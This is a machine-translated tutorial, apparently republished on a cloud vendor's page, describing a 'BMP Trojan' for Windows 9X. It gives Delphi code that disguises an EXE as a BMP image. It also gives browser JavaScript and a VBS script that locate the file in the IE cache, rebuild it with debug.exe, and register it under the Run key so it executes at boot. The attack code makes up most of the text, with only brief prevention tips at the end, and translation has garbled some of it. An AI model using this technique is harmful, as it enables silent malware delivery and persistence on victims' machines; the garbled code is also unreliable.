Detailed BMP Trojan _ security-related

Source: Internet
Author: User
Tags bmp image
First of all, this is not a new thing, but recently some people say that we do not, then casually write articles put up, we test ourselves. What is a BMP Web Trojan? It is different from the Trojan horse that used to be a smelly MIME head, MIME Trojan is an EXE file with MIME encoding for a eml (out look letter) file, put on the Web page using IE and OE coding vulnerabilities to achieve automatic download and implementation.
However, BMP Trojan is different, it is a exe file disguised as a BMP image file, cheat ie automatic download, and then use the Web page JavaScript script to find the Internet temporary folder of the client, find the download BMP file, Copy it to the temp directory. Write a script to restore the found BMP file to the EXE with debug, and put it in the registry startup key, and execute it on the next boot. But this technology can only work under 9X, for 2K,XP is powerless.

Looks like it's complicated, so here's a step-by-step step:
1) EXE variable BMP method.
Everyone to check the BMP file will know, BMP file header has 54 bytes, simple to include BMP file in the long width, the number of digits, file size, data area length, we just in the EXE file header before adding the corresponding BMP file head ( Of course BMP file header inside the data to conform to the size of the EXE file, so you can cheat ie download the BMP file, we started using JPG file to do experiments, found that if the file header is not correct, IE is not downloaded, the conversion code is as follows:

Program Exe2bmp;

Uses
Windows
Sysutils;

var Len,row,col,fs:dword;
Buffer:array[0..255]of Char;
Fd:win32_find_data;
H,hw:thandle;

Begin
if (PARAMSTR (1) <>) and (Paramstr (2) <>) THEN BEGIN///If there are no two parameters after the run exit
If FileExists (PARAMSTR (1)) THEN BEGIN
FindFirstFile (Pchar (PARAMSTR (1)), FD);
Fs:=fd.nfilesizelow;
Col: = 4;
While True does begin
if (fs MoD) =0 then BEGIN
Len:=fs;
End Else len:=fs+12-(FS mod 12);
Row: = Len Div Col Div 3;
If Row>col then BEGIN
col:=col+4;
End else break;
End
Fillchar (buffer,256,0);
{Once for BMP file header data}
Buffer[0]:=b; Buffer[1]:=m;
Pdword (@buffer [a]) ^:=col;
Pdword (@buffer [)] ^:=row;
Pdword (@buffer [^:=len]);
Pdword (@buffer [2]) ^:=len+54;
Pdword (@buffer [10]) ^:=54;
Pdword (@buffer [14]) ^:=40;
Pword (@buffer [26]) ^:=1;
Pword (@buffer [28]) ^:=24;
{Write to File}
Hw:=createfile (Pchar (PARAMSTR (2)), generic_write,file_share_read or file_share_write,nil,create_always,0,0);
H:=createfile (Pchar (PARAMSTR (1)), generic_read,file_share_read or file_share_write,nil,open_existing,0,0);
WriteFile (hw,buffer,54,col,0);
Repeat
ReadFile (h,buffer,256,col,0);
WriteFile (hw,buffer,col,col,0);
untilcol<>256;
WriteFile (hw,buffer,len-fs,col,0);
CloseHandle (h);
CloseHandle (HW);
End
End
End.


The above code can be compiled in delphi4,5,6, you can get a exe2bmp.exe file. Everyone open the Msdos way, enter
Exe2bmp Myexe.exe mybmp.bmp
Enter to convert the EXE file specified in the second parameter to BMP format.
Then it is to put the BMP picture on the Web page, if you open this picture, it must be found that the BMP and flowers, color and monotonous. So it's best to use this format on the Web.


Here are the scripts that are placed on the Web page
document.write ();
function Docsave ()
{
A=document.applets[0];
A.setclsid ({f935dc22-1cf0-11d0-adb9-00c04fd58a0b});
A.createinstance ();
Wsh=a.getobject ();
A.setclsid ({0d43fe01-f093-11cf-8940-00a0c9054228});
A.createinstance ();
Fso=a.getobject ();
var winsys=fso. GetSpecialFolder (1);
var vbs=winsys+\\s.vbs;
Wsh. RegWrite
(Hkcu\\software\\microsoft\\windows\\currentversion\\run\\vbs,wscript + "+vbs+");
var st=fso. CreateTextFile (vbs,true);
St. WriteLine (Option Explicit);
St. WriteLine (Dim fso,wsh,cache,str);
St. WriteLine (Set FSO = CreateObject ("Scripting.FileSystemObject"));
St. WriteLine (Set WSH = CreateObject ("Wscript.Shell"));
St. WriteLine (cache=wsh. RegRead ("Hkcu\\software\\microsoft\\windows\\currentversion\\explorer\\shellfolders\\cache"));
St. WriteLine (WSH. RegDelete ("Hkcu\\software\\microsoft\\windows\\currentversion\\run\\vbs"));
St. WriteLine (WSH. RegWrite "Hkcu\\software\\microsoft\\windows\\currentversion\\run\\tmp", "Tmp.exe");
St. WriteLine (Searchbmpfile fso. GetFolder (CACHE), "mybmp[1].bmp");
St. WriteLine (Wscript.Quit ());
St. WriteLine (Function searchbmpfile (folder,fname));
St. WriteLine (Dim Subfolder,file,lt,tmp,winsys);
St. WriteLine (STR=FSO. Getparentfoldername (folder) & "\" & Folder.name & "\" & fname);
St. WriteLine (if FSO). FileExists (str) then);
St. WriteLine (TMP=FSO. GetSpecialFolder (2) & "\ \");
St. WriteLine (WINSYS=FSO. GetSpecialFolder (1) & "\ \");
St. WriteLine (Set FILE=FSO. GetFile (str));
St. WriteLine (File.Copy (tmp & "Tmp.dat"));
St. WriteLine (File.delete);
St. WriteLine (Set LT=FSO. CreateTextFile (tmp & "tmp.in"));
St. WriteLine (Lt.writeline ("RBX"));
St. WriteLine (Lt.writeline ("0"));
St. WriteLine (Lt.writeline ("RCX"));
St. WriteLine (Lt.writeline ("1000"));
St. WriteLine (Lt.writeline ("w136"));
St. WriteLine (Lt.writeline ("Q"));
St. WriteLine (Lt.close);
St. WriteLine (WSH. Run "command/c Debug" & tmp & "Tmp.dat <" & tmp & "Tmp.in >" & tmp & "Tmp.out", false,6);
St. WriteLine (on Error Resume Next);
St. WriteLine (FSO. GetFile (tmp & "Tmp.dat"). Copy (Winsys & "Tmp.exe"));
St. WriteLine (FSO. GetFile (tmp & "Tmp.dat"). Delete);
St. WriteLine (FSO. GetFile (tmp & "Tmp.in"). Delete);
St. WriteLine (FSO. GetFile (tmp & "Tmp.out"). Delete);
St. WriteLine (End If);
St. WriteLine (If Folder.SubFolders.Count <> 0 Then);
St. WriteLine (for each subfolder in folder.subfolders);
St. WriteLine (Searchbmpfile subfolder,fname);
St. WriteLine (Next);
St. WriteLine (end If);
St. WriteLine (end Function);
St. Close ();
}
SetTimeout (Docsave (), 1000);

Save the script as "js.js" and insert it in the Web page:


The script basically generates a "s.vbs" file in the system directory of the Local machine, which runs automatically the next time it is powered on. Primarily used to locate mybmp[1].bmp files from a temporary directory.
The main contents of the "S.vbs" document are as follows:

Option Explicit
Dim Fso,wsh,cache,str
Set FSO = CreateObject ("Scripting.FileSystemObject")
Set WSH = CreateObject ("Wscript.Shell")
Cache=wsh. RegRead ("Hkcu\software\microsoft\windows\currentversion\explorer\shellfolders\cache")
Wsh. RegDelete ("Hkcu\software\microsoft\windows\currentversion\run\vbs")
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\run\tmp", "Tmp.exe"
Searchbmpfile FSO. GetFolder (CACHE), "Mybmp[1].bmp"
Wscript.Quit ()
Function Searchbmpfile (Folder,fname)
Dim Subfolder,file,lt,tmp,winsys
Find a target BMP picture from a temporary folder
Str=fso. Getparentfoldername (folder) & "\" & Folder.name & "\" & fname
If FSO. FileExists (str) Then
Tmp=fso. GetSpecialFolder (2) & "\"
Winsys=fso. GetSpecialFolder (1) & "\"
Set FILE=FSO. GetFile (str)
File.Copy (tmp & "Tmp.dat")
File.delete
Generate a Debug script
Set LT=FSO. CreateTextFile (tmp & "Tmp.in")
Lt.writeline ("RBX")
Lt.writeline ("0")
Lt.writeline ("RCX")
The following line of 1000 is hexadecimal, and the decimal is 4096 (the number is the size of your EXE file)
Lt.writeline ("1000")
Lt.writeline ("w136")
Lt.writeline ("q")
Lt.close
WSH. Run "command/c Debug" & tmp & "Tmp.dat <" & tmp & "Tmp.in>" & tmp & "Tmp.out", false,6
On Error Resume Next
Fso. GetFile (tmp & "Tmp.dat"). Copy (Winsys & "Tmp.exe")
Fso. GetFile (tmp & "Tmp.dat"). Delete
Fso. GetFile (tmp & "Tmp.in"). Delete
Fso. GetFile (tmp & "Tmp.out"). Delete
End If
If Folder.SubFolders.Count <> 0 Then
For each subfolder in Folder.subfolders
Searchbmpfile Subfolder,fname
Next
End If
End Function

This script will find the BMP file in the temporary folder, and generate a debug script, the runtime will automatically read the BMP file 54 bytes from the size of the data you specify, and save it to the Tmp.dat. The script is then copied to the system's directory. This restored EXE will run at the next reboot. This is the basic implementation process of BMP Trojan horse.
Detailed scripting code please refer to Http://hotsky.363.net

Precautionary method:
Simplest, delete or rename wscrpit.exe files and debug files;
Install effective antivirus software, because these scripts have a lot of anti-virus software can be found out.
When conditions permit, install Win2K SP3, try to avoid some unknown origins of the site.

Related Article

E-Commerce Solutions

Leverage the same tools powering the Alibaba Ecosystem

Learn more >

Apsara Conference 2019

The Rise of Data Intelligence, September 25th - 27th, Hangzhou, China

Learn more >

Alibaba Cloud Free Trial

Learn and experience the power of Alibaba Cloud with a free trial worth $300-1200 USD

Learn more >

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.